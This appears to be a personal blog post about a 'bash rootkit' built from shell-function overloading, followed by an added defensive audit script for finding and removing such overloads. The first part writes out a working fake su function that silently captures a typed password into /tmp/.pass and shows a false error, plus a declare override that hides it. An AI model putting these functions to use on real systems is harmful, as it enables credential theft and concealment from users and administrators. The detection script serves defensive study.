An article I came across recently while going through my blog feed, and found quite interesting. I'm recording it here and will practice shell by implementing it when I have time.
A purely imaginary (YY) bash rootkit, just for fun.
Bash command lookup order: alias -> function -> builtin -> external program.
You can define a function to overload the execution of an external program. Example:
[xiaoyu@localdomain ~]$ function su { echo "Hello world"; }
[xiaoyu@localdomain ~]$ su
Hello world
[xiaoyu@localdomain ~]$
The function we defined is what runs; the real /bin/su is never executed.
A function like the following can be used to steal a password:
[xiaoyu@localdomain tmp]$ function su { echo -n "Password:"; stty -echo; read pass; echo ""; echo $pass >> /tmp/.pass; sleep 3; echo "su: incorrect password"; stty echo; }
[xiaoyu@localdomain tmp]$ touch /tmp/.pass
[xiaoyu@localdomain tmp]$ chmod a+w /tmp/.pass
[xiaoyu@localdomain tmp]$ su
Password:
su: incorrect password
[xiaoyu@localdomain tmp]$ cat /tmp/.pass
123456
[xiaoyu@localdomain tmp]$
Obviously the sample code above is incomplete. You would have to adjust it yourself, for example by removing the su function definition once the password has been captured; otherwise every input keeps being reported as incorrect.
Bash has a declare -f command that shows the defined functions:
[xiaoyu@localdomain tmp]$ declare -f
su ()
{
    echo -n "Password:";
    stty -echo;
    read pass;
    echo "";
    echo $pass >> /tmp/.pass;
    sleep 3;
    echo "su: incorrect password";
    stty echo
}
So it is plainly visible. Never mind, we can use the bash lookup order again and overload declare as well:
[xiaoyu@localdomain ~]$ function declare { echo "Command not found"; }
[xiaoyu@localdomain ~]$ declare -f
Command not found
Now it is hidden.
Well, back to the title. Why a "YY" bash rootkit, and where is the rootkit? You could overload ls and netstat so that they first run the real binary and save its output, for example result=`/bin/ls`, then filter the result with a regular expression before displaying it. I won't give the specific code here.
The advantage of a bash rootkit is that it can be installed with nothing more than an ordinary user's permissions. For example, when you need to hide a file under a regular user account to stash something.
Well, that's all. I'll write more next time I think of something.
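As an added example (my own, not from the original post or the article it cites), here is a small bash audit script for the defender's side of the lookup-order trick and the declare overload above: every check goes through `builtin`, so a function named type, declare, unset or command cannot answer in the shell's place, and `type -P` / `command` reach the real binary past any function or alias. It assumes bash 4 or later; the `su` and `declare` functions near the bottom are constructed samples with harmless bodies standing in for the ones in the post.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: audit a bash session for
# commands shadowed by functions or aliases and resolve the real binary
# regardless. All builtins are called through `builtin` so that a
# function named type, declare, unset or command cannot hijack the audit.
# If started by a non-bash sh, re-exec under bash (assumes bash 4+).
[ -n "$BASH_VERSION" ] || { [ -f "$0" ] && exec bash "$0" "$@"; }

# What bash would dispatch NAME to: alias, function, builtin, file,
# keyword, or "unknown" when nothing by that name exists.
resolve_kind() {
    builtin type -t "$1" 2>/dev/null || printf 'unknown\n'
}

# Path of the executable on PATH for NAME, ignoring any function or
# alias of the same name (what `command NAME` would actually run).
real_path() {
    builtin type -P "$1"
}

# Print "NAME KIND" for each argument that resolves to a function or
# alias instead of the on-disk program; prints nothing when clean.
find_shadowed() {
    local name kind
    for name in "$@"; do
        kind=$(resolve_kind "$name")
        case $kind in
            alias|function) printf '%s %s\n' "$name" "$kind" ;;
        esac
    done
}

# Names of all functions in this session, read via `builtin declare`
# so that an overloaded `declare` cannot answer "Command not found".
# `declare -F` prints lines of the form "declare -f NAME".
list_functions() {
    local flag opt name
    while read -r flag opt name; do
        printf '%s\n' "$name"
    done < <(builtin declare -F)
}

# Source file and line where function NAME was defined: with extdebug
# set, `declare -F NAME` prints "NAME LINE FILE", which in a real case
# points straight at the rc file that planted the function.
where_defined() {
    local out
    builtin shopt -s extdebug
    out=$(builtin declare -F "$1" || builtin true)
    builtin shopt -u extdebug
    printf '%s\n' "$out"
}

# Run NAME as the external program, bypassing functions and aliases.
run_real() {
    builtin command "$@"
}

# Remove a shadowing function so the real command is reachable again.
unshadow() {
    builtin unset -f "$1"
}

# Constructed sample: the same two overloads the post demonstrates,
# with harmless bodies in place of the password-capturing one.
function su { printf 'shadowed su\n'; }
function declare { printf 'Command not found\n'; }

main() {
    printf 'declare -f says: %s\n' "$(declare -f)"   # answered by the function
    printf 'shadowed: %s\n' "$(find_shadowed su ls netstat declare)"
    printf 'functions: %s\n' "$(list_functions | command tr '\n' ' ')"
    printf 'su defined at: %s\n' "$(where_defined su)"
    printf 'real ls: %s\n' "$(real_path ls)"
    unshadow su
    printf 'after unshadow, su is a %s\n' "$(resolve_kind su)"
}
main "$@"
```

Running it shows what `declare -f` claims next to what `builtin declare -F` actually finds, the file and line where the `su` function was defined, and the on-disk `ls` that `command ls` would run. A function only exists in shells that sourced it, so the other half of the check is reading ~/.bashrc, ~/.bash_profile, /etc/bash.bashrc, /etc/profile.d/* and whatever $BASH_ENV names, or simply comparing against a fresh `bash --norc --noprofile`.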